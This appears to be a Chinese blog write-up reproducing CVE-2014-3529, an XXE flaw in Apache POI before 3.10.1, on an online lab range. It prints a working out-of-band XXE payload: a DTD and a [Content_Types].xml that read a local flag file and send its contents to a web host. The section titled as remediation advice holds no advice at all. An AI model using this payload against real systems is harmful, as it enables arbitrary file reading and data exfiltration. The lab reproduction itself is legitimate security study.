[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

  • 开发
  • 30

一、漏洞情况分析

Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

二、漏洞复现

春秋云境.com

进入靶场

准备文件和环境

创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改

###xxe.dtd###

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/%file;'>">
%all;

###[Content_Types].xml###
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % dtd SYSTEM "http://127.0.0.1/xxe.dtd">
%dtd; %send;]>

[Content_Types].xml文件压缩成zip包,名字任意

 使用python开启一个web服务

 开始复现

三、漏洞处置建议 

难受三天,今天睡个好觉。把靶场关了,跟漏洞说“白白吧”

阅读全部

相关推荐

  6. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-01-18 20:44:01       22 阅读

  7. thinkphp漏洞

    2024-01-18 20:44:01       12 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-01-18 20:44:01       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-18 20:44:01       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-18 20:44:01       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-18 20:44:01       20 阅读

热门阅读

  2. linux-等保三级脚本(1)

    2024-01-18 20:44:01       29 阅读

  4. Android 启动页白屏优化

    2024-01-18 20:44:01       42 阅读

  5. What is `XSS` does?

    2024-01-18 20:44:01       34 阅读

  12. C#将货币金额数字转大写汉字

    2024-01-18 20:44:01       32 阅读

  19. [BUG] cannot import name ‘quantize_qat‘ from ‘onnxruntime.quantization‘

    2024-01-18 20:44:01       36 阅读

  21. MySQL8.0.26-Linux版安装

    2024-01-18 20:44:01       39 阅读

  23. 网络工程师:计算机基础知识面试题(四)

    2024-01-18 20:44:01       28 阅读
  26. tinyxml2

    tinyxml2

    2024-01-18 20:44:01      32 阅读

  28. redhat linux 8 安装 阿里云centos-8 yum源(网络yum源配置)

    2024-01-18 20:44:01       33 阅读

  29. 设计模式——中介者模式

    2024-01-18 20:44:01       32 阅读

  30. DEJA_VU3D - Cesium功能集 之 119-三维热力图

    2024-01-18 20:44:01       39 阅读